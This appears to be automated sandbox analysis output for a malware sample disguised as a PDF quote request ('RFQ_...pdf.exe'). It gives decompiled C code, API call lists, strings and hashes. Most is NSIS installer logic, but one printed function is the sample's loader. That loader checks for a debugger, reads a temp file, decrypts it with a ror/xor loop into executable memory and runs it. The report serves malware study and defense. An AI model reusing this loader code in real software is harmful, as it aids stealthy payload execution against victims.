                                                                        0x0040329b
                                                                        0x004032a4
                                                                        0x004032a9
                                                                        0x004032aa
                                                                        0x004032af
                                                                        0x004032b3
                                                                        0x00403316
                                                                        0x00403316
                                                                        0x0040331b
                                                                        0x00403323
                                                                        0x0040344e
                                                                        0x00403455
                                                                        0x00403471
                                                                        0x0040347e
                                                                        0x00403487
                                                                        0x00403489
                                                                        0x0040348b
                                                                        0x0040348d
                                                                        0x0040348f
                                                                        0x00403491
                                                                        0x00403493
                                                                        0x004034a3
                                                                        0x004034a5
                                                                        0x004034a7
                                                                        0x004034b4
                                                                        0x004034c3
                                                                        0x004034cb
                                                                        0x004034d3
                                                                        0x004034d3
                                                                        0x004034a7
                                                                        0x00403493
                                                                        0x0040348f
                                                                        0x004034d8
                                                                        0x004034de
                                                                        0x004034e0
                                                                        0x004034e4
                                                                        0x004034e4
                                                                        0x004034e0
                                                                        0x004034e9
                                                                        0x004034ee
                                                                        0x004034f1
                                                                        0x004034f3
                                                                        0x004034f3
                                                                        0x004034fb
                                                                        0x004034fb
                                                                        0x0040332f
                                                                        0x00403336
                                                                        0x00403336
                                                                        0x004032bb
                                                                        0x00403306
                                                                        0x00403306
                                                                        0x00403312
                                                                        0x00000000
                                                                        0x00403312
                                                                        0x004032c4
                                                                        0x004032d1
                                                                        0x004032c8
                                                                        0x004032ce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032d0
                                                                        0x004032d0
                                                                        0x004032d0
                                                                        0x004032d5
                                                                        0x004032d7
                                                                        0x004032dc
                                                                        0x00403342
                                                                        0x0040334a
                                                                        0x00403350
                                                                        0x0040335f
                                                                        0x00403361
                                                                        0x0040336a
                                                                        0x00403375
                                                                        0x0040337f
                                                                        0x00403387
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004033b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004033c9
                                                                        0x004033d2
                                                                        0x004033de
                                                                        0x004033ee
                                                                        0x004033e0
                                                                        0x004033e6
                                                                        0x004033e6
                                                                        0x004033f9
                                                                        0x00403403
                                                                        0x0040340e
                                                                        0x00403415
                                                                        0x0040341b
                                                                        0x00403422
                                                                        0x00403429
                                                                        0x0040342c
                                                                        0x00403432
                                                                        0x00403432
                                                                        0x00403429
                                                                        0x00403434
                                                                        0x00403434
                                                                        0x0040343a
                                                                        0x0040343e
                                                                        0x00000000
                                                                        0x00403449
                                                                        0x004032de
                                                                        0x004032e1
                                                                        0x004032ec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032f4
                                                                        0x004032ff
                                                                        0x00403304
                                                                        0x00000000
                                                                        0x00403304
                                                                        0x00000000
                                                                        0x0040327d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403231
                                                                        0x00403231
                                                                        0x00403231
                                                                        0x00403232
                                                                        0x00403232
                                                                        0x00000000
                                                                        0x00403231
                                                                        0x00000000
                                                                        0x00403295
                                                                        0x004031bc
                                                                        0x004031c8
                                                                        0x004031d4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • #17.COMCTL32 ref: 00403164
                                                                        • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                        • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                          • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                        • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 004031E0
                                                                        • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 004031F5
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000020), ref: 00403220
                                                                        • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                        • ExitProcess.KERNEL32 ref: 00403336
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                        • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                        • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                        • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                        • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                        • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                        • CopyFileA.KERNEL32 ref: 004033C1
                                                                        • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                        • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                        • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                        • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                        • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                        • ExitProcess.KERNEL32 ref: 004034FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                        • API String ID: 3079827372-2867230742
                                                                        • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                        • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                        • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                        • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				struct _WIN32_FIND_DATAA _v332;
                                                                        				signed int _t37;
                                                                        				char* _t49;
                                                                        				signed char _t51;
                                                                        				signed int _t54;
                                                                        				signed int _t57;
                                                                        				signed int _t63;
                                                                        				signed int _t65;
                                                                        				void* _t67;
                                                                        				signed int _t70;
                                                                        				CHAR* _t72;
                                                                        				CHAR* _t74;
                                                                        				char* _t77;
                                                                        
                                                                        				_t74 = _a4;
                                                                        				_t37 = E004055AC(__eflags, _t74);
                                                                        				_v12 = _t37;
                                                                        				if((_a8 & 0x00000008) != 0) {
                                                                        					_t65 = DeleteFileA(_t74); // executed
                                                                        					asm("sbb eax, eax");
                                                                        					_t67 =  ~_t65 + 1;
                                                                        					 *0x7a3008 =  *0x7a3008 + _t67;
                                                                        					return _t67;
                                                                        				}
                                                                        				_t70 = _a8 & 0x00000001;
                                                                        				__eflags = _t70;
                                                                        				_v8 = _t70;
                                                                        				if(_t70 == 0) {
                                                                        					L5:
                                                                        					E004059BF(0x7a0588, _t74);
                                                                        					__eflags = _t70;
                                                                        					if(_t70 == 0) {
                                                                        						E00405513(_t74);
                                                                        					} else {
                                                                        						lstrcatA(0x7a0588, "\\*.*");
                                                                        					}
                                                                        					lstrcatA(_t74, 0x409010);
                                                                        					_t72 =  &(_t74[lstrlenA(_t74)]);
                                                                        					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                                                        					__eflags = _t37 - 0xffffffff;
                                                                        					_a4 = _t37;
                                                                        					if(_t37 == 0xffffffff) {
                                                                        						L26:
                                                                        						__eflags = _v8;
                                                                        						if(_v8 != 0) {
                                                                        							_t31 = _t72 - 1;
                                                                        							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                                                        							__eflags =  *_t31;
                                                                        						}
                                                                        						goto L28;
                                                                        					} else {
                                                                        						goto L9;
                                                                        					}
                                                                        					do {
                                                                        						L9:
                                                                        						_t77 =  &(_v332.cFileName);
                                                                        						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                                                        						__eflags =  *_t49;
                                                                        						if( *_t49 != 0) {
                                                                        							__eflags = _v332.cAlternateFileName;
                                                                        							if(_v332.cAlternateFileName != 0) {
                                                                        								_t77 =  &(_v332.cAlternateFileName);
                                                                        							}
                                                                        						}
                                                                        						__eflags =  *_t77 - 0x2e;
                                                                        						if( *_t77 != 0x2e) {
                                                                        							L16:
                                                                        							E004059BF(_t72, _t77);
                                                                        							_t51 = _v332.dwFileAttributes;
                                                                        							__eflags = _t51 & 0x00000010;
                                                                        							if((_t51 & 0x00000010) == 0) {
                                                                        								SetFileAttributesA(_t74, _t51 & 0x000000fe);
                                                                        								_t54 = DeleteFileA(_t74);
                                                                        								__eflags = _t54;
                                                                        								if(_t54 != 0) {
                                                                        									E00404D62(0xfffffff2, _t74);
                                                                        								} else {
                                                                        									__eflags = _a8 & 0x00000004;
                                                                        									if((_a8 & 0x00000004) == 0) {
                                                                        										 *0x7a3008 =  *0x7a3008 + 1;
                                                                        									} else {
                                                                        										E00404D62(0xfffffff1, _t74);
                                                                        										E00405707(_t74, 0);
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = (_a8 & 0x00000003) - 3;
                                                                        								if(__eflags == 0) {
                                                                        									E00405301(_t72, __eflags, _t74, _a8);
                                                                        								}
                                                                        							}
                                                                        							goto L24;
                                                                        						}
                                                                        						_t63 =  *((intOrPtr*)(_t77 + 1));
                                                                        						__eflags = _t63;
                                                                        						if(_t63 == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						__eflags = _t63 - 0x2e;
                                                                        						if(_t63 != 0x2e) {
                                                                        							goto L16;
                                                                        						}
                                                                        						__eflags =  *((char*)(_t77 + 2));
                                                                        						if( *((char*)(_t77 + 2)) == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						goto L16;
                                                                        						L24:
                                                                        						_t57 = FindNextFileA(_a4,  &_v332);
                                                                        						__eflags = _t57;
                                                                        					} while (_t57 != 0);
                                                                        					_t37 = FindClose(_a4);
                                                                        					goto L26;
                                                                        				} else {
                                                                        					__eflags = _t37;
                                                                        					if(_t37 == 0) {
                                                                        						L28:
                                                                        						__eflags = _v8;
                                                                        						if(_v8 == 0) {
                                                                        							L36:
                                                                        							return _t37;
                                                                        						}
                                                                        						__eflags = _v12;
                                                                        						if(_v12 != 0) {
                                                                        							_t37 = E00405C94(_t74);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 == 0) {
                                                                        								goto L36;
                                                                        							}
                                                                        							E004054CC(_t74);
                                                                        							SetFileAttributesA(_t74, 0x80);
                                                                        							_t37 = RemoveDirectoryA(_t74);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 != 0) {
                                                                        								return E00404D62(0xffffffe5, _t74);
                                                                        							}
                                                                        							__eflags = _a8 & 0x00000004;
                                                                        							if((_a8 & 0x00000004) == 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							E00404D62(0xfffffff1, _t74);
                                                                        							return E00405707(_t74, 0);
                                                                        						}
                                                                        						L30:
                                                                        						 *0x7a3008 =  *0x7a3008 + 1;
                                                                        						return _t37;
                                                                        					}
                                                                        					__eflags = _a8 & 0x00000002;
                                                                        					if((_a8 & 0x00000002) == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}


















                                                                        0x0040530c
                                                                        0x00405310
                                                                        0x00405319
                                                                        0x0040531c
                                                                        0x0040531f
                                                                        0x00405327
                                                                        0x00405329
                                                                        0x0040532a
                                                                        0x00000000
                                                                        0x0040532a
                                                                        0x00405339
                                                                        0x00405339
                                                                        0x0040533c
                                                                        0x0040533f
                                                                        0x00405353
                                                                        0x0040535a
                                                                        0x0040535f
                                                                        0x00405361
                                                                        0x00405371
                                                                        0x00405363
                                                                        0x00405369
                                                                        0x00405369
                                                                        0x0040537c
                                                                        0x00405391
                                                                        0x00405393
                                                                        0x00405399
                                                                        0x0040539c
                                                                        0x0040539f
                                                                        0x00405461
                                                                        0x00405461
                                                                        0x00405465
                                                                        0x00405467
                                                                        0x00405467
                                                                        0x00405467
                                                                        0x00405467
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004053a5
                                                                        0x004053a5
                                                                        0x004053ae
                                                                        0x004053b4
                                                                        0x004053b9
                                                                        0x004053bc
                                                                        0x004053be
                                                                        0x004053c2
                                                                        0x004053c4
                                                                        0x004053c4
                                                                        0x004053c2
                                                                        0x004053c7
                                                                        0x004053ca
                                                                        0x004053dd
                                                                        0x004053df
                                                                        0x004053e4
                                                                        0x004053ea
                                                                        0x004053ec
                                                                        0x00405407
                                                                        0x0040540e
                                                                        0x00405414
                                                                        0x00405416
                                                                        0x0040543b
                                                                        0x00405418
                                                                        0x00405418
                                                                        0x0040541c
                                                                        0x00405430
                                                                        0x0040541e
                                                                        0x00405421
                                                                        0x00405429
                                                                        0x00405429
                                                                        0x0040541c
                                                                        0x004053ee
                                                                        0x004053f4
                                                                        0x004053f6
                                                                        0x004053fc
                                                                        0x004053fc
                                                                        0x004053f6
                                                                        0x00000000
                                                                        0x004053ec
                                                                        0x004053cc
                                                                        0x004053cf
                                                                        0x004053d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004053d3
                                                                        0x004053d5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004053d7
                                                                        0x004053db
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405440
                                                                        0x0040544a
                                                                        0x00405450
                                                                        0x00405450
                                                                        0x0040545b
                                                                        0x00000000
                                                                        0x00405341
                                                                        0x00405341
                                                                        0x00405343
                                                                        0x0040546b
                                                                        0x0040546e
                                                                        0x00405471
                                                                        0x004054c9
                                                                        0x004054c9
                                                                        0x004054c9
                                                                        0x00405473
                                                                        0x00405476
                                                                        0x00405481
                                                                        0x00405486
                                                                        0x00405488
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040548b
                                                                        0x00405496
                                                                        0x0040549d
                                                                        0x004054a3
                                                                        0x004054a5
                                                                        0x00000000
                                                                        0x004054c1
                                                                        0x004054a7
                                                                        0x004054ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004054b0
                                                                        0x00000000
                                                                        0x004054b7
                                                                        0x00405478
                                                                        0x00405478
                                                                        0x00000000
                                                                        0x00405478
                                                                        0x00405349
                                                                        0x0040534d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040534d

                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040531F
                                                                        • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405369
                                                                        • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040537C
                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405382
                                                                        • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405393
                                                                        • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                        • FindClose.KERNEL32(?), ref: 0040545B
                                                                        Strings
                                                                        • \*.*, xrefs: 00405363
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                        • "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" , xrefs: 0040530B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-3349225713
                                                                        • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                        • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                        • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                        • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E72AD1000() {
                                                                        				long _v8;
                                                                        				short _v528;
                                                                        				long _t12;
                                                                        				void* _t16;
                                                                        				signed char _t22;
                                                                        				void* _t39;
                                                                        				long _t42;
                                                                        
                                                                        				_v8 = 0;
                                                                        				if(IsDebuggerPresent() != 0) {
                                                                        					DebugBreak();
                                                                        				}
                                                                        				_t12 = GetTempPathW(0x103,  &_v528);
                                                                        				if(_t12 != 0) {
                                                                        					lstrcatW( &_v528, L"\\dax13un2d6");
                                                                        					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                        					_t39 = _t16;
                                                                        					if(_t39 == 0xffffffff) {
                                                                        						L12:
                                                                        						return _t16;
                                                                        					}
                                                                        					_t16 = GetFileSize(_t39, 0);
                                                                        					_t42 = _t16;
                                                                        					if(_t42 == 0xffffffff) {
                                                                        						L11:
                                                                        						goto L12;
                                                                        					}
                                                                        					_t16 = VirtualAlloc(0, _t42, 0x3000, 0x40); // executed
                                                                        					 *0x72ad3000 = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t16 = ReadFile(_t39, _t16, _t42,  &_v8, 0); // executed
                                                                        					if(_t16 == 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t22 = 0;
                                                                        					if(_v8 <= 0) {
                                                                        						L10:
                                                                        						_t16 =  *0x72ad3000(); // executed
                                                                        						goto L11;
                                                                        					}
                                                                        					do {
                                                                        						asm("ror cl, 0x3");
                                                                        						asm("ror cl, 0x2");
                                                                        						 *((char*)( *0x72ad3000 + _t22)) = (_t22 - ((((( *((intOrPtr*)( *0x72ad3000 + _t22)) + 0x00000029 ^ 0x00000051) - 0x0000006b ^ 0x0000002c) + _t22 ^ 0x000000e6) + 0x00000065 ^ 0x000000ea) - _t22 + _t22 ^ _t22) ^ 0x00000092) + 0x26;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t22 < _v8);
                                                                        					goto L10;
                                                                        				}
                                                                        				return _t12;
                                                                        			}










                                                                        0x72ad1009
                                                                        0x72ad1018
                                                                        0x72ad101a
                                                                        0x72ad101a
                                                                        0x72ad102c
                                                                        0x72ad1034
                                                                        0x72ad1047
                                                                        0x72ad1066
                                                                        0x72ad106c
                                                                        0x72ad1071
                                                                        0x72ad1105
                                                                        0x00000000
                                                                        0x72ad1105
                                                                        0x72ad107b
                                                                        0x72ad1081
                                                                        0x72ad1086
                                                                        0x72ad1104
                                                                        0x00000000
                                                                        0x72ad1104
                                                                        0x72ad1092
                                                                        0x72ad1098
                                                                        0x72ad109f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72ad10aa
                                                                        0x72ad10b2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72ad10b5
                                                                        0x72ad10ba
                                                                        0x72ad10fd
                                                                        0x72ad10fd
                                                                        0x00000000
                                                                        0x72ad1103
                                                                        0x72ad10c0
                                                                        0x72ad10e4
                                                                        0x72ad10eb
                                                                        0x72ad10f4
                                                                        0x72ad10f7
                                                                        0x72ad10f8
                                                                        0x00000000
                                                                        0x72ad10c0
                                                                        0x72ad1109

                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 72AD1010
                                                                        • DebugBreak.KERNEL32 ref: 72AD101A
                                                                        • GetTempPathW.KERNEL32(00000103,?), ref: 72AD102C
                                                                        • lstrcatW.KERNEL32(?,\dax13un2d6), ref: 72AD1047
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72AD1066
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 72AD107B
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 72AD1092
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 72AD10AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657581341.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true
                                                                        • Associated: 00000000.00000002.657575415.0000000072AD0000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.657585797.0000000072AD2000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.657591786.0000000072AD4000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                        • String ID: \dax13un2d6
                                                                        • API String ID: 4020703165-2054650729
                                                                        • Opcode ID: dac1c0fc91f7b2cdbb2a8b3c5d87bddba4db80d6fd282744316daa6bbf083383
                                                                        • Instruction ID: 6b560c4c47377a376afa48876b926c25177e28d87b76e01f4e8bff80a978065b
                                                                        • Opcode Fuzzy Hash: dac1c0fc91f7b2cdbb2a8b3c5d87bddba4db80d6fd282744316daa6bbf083383
                                                                        • Instruction Fuzzy Hash: BA213772980210AFE7109B76CCAEBDB7BB8E705751F605259F612E20CEE634850BCA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00401FDC(int __ebx) {
                                                                        				struct HINSTANCE__* _t20;
                                                                        				struct HINSTANCE__* _t27;
                                                                        				int _t28;
                                                                        				struct HINSTANCE__* _t33;
                                                                        				CHAR* _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t37;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				 *(_t37 - 4) = 1;
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				if( *0x7a3030 < __ebx) {
                                                                        					_push(0xffffffe7);
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t35 = E00402A9A(0xfffffff0);
                                                                        					 *(_t37 + 8) = E00402A9A(1);
                                                                        					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                        						L3:
                                                                        						_t20 = LoadLibraryA(_t35); // executed
                                                                        						_t33 = _t20;
                                                                        						if(_t33 == _t28) {
                                                                        							_push(0xfffffff6);
                                                                        							L14:
                                                                        							E00401428();
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        					} else {
                                                                        						_t27 = GetModuleHandleA(_t35); // executed
                                                                        						_t33 = _t27;
                                                                        						if(_t33 != __ebx) {
                                                                        							L4:
                                                                        							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                        							if(_t36 == _t28) {
                                                                        								E00404D62(0xfffffff7,  *(_t37 + 8));
                                                                        							} else {
                                                                        								 *(_t37 - 4) = _t28;
                                                                        								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                        									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
                                                                        								} else {
                                                                        									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                        									if( *_t36() != 0) {
                                                                        										 *(_t37 - 4) = 1;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                        								FreeLibrary(_t33);
                                                                        							}
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetErrorMode(_t28);
                                                                        				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                                                        				return 0;
                                                                        			}










                                                                        0x00401fdc
                                                                        0x00401fe4
                                                                        0x00401fe7
                                                                        0x00401ff3
                                                                        0x00402093
                                                                        0x00000000
                                                                        0x00401ff9
                                                                        0x00402001
                                                                        0x0040200b
                                                                        0x0040200e
                                                                        0x0040201d
                                                                        0x0040201e
                                                                        0x00402024
                                                                        0x00402028
                                                                        0x0040208f
                                                                        0x00402095
                                                                        0x00402095
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402010
                                                                        0x00402011
                                                                        0x00402017
                                                                        0x0040201b
                                                                        0x0040202a
                                                                        0x00402034
                                                                        0x00402038
                                                                        0x0040207c
                                                                        0x0040203a
                                                                        0x0040203d
                                                                        0x00402040
                                                                        0x00402070
                                                                        0x00402042
                                                                        0x00402045
                                                                        0x0040204e
                                                                        0x00402050
                                                                        0x00402050
                                                                        0x0040204e
                                                                        0x00402040
                                                                        0x00402084
                                                                        0x00402087
                                                                        0x00402087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040201b
                                                                        0x0040200e
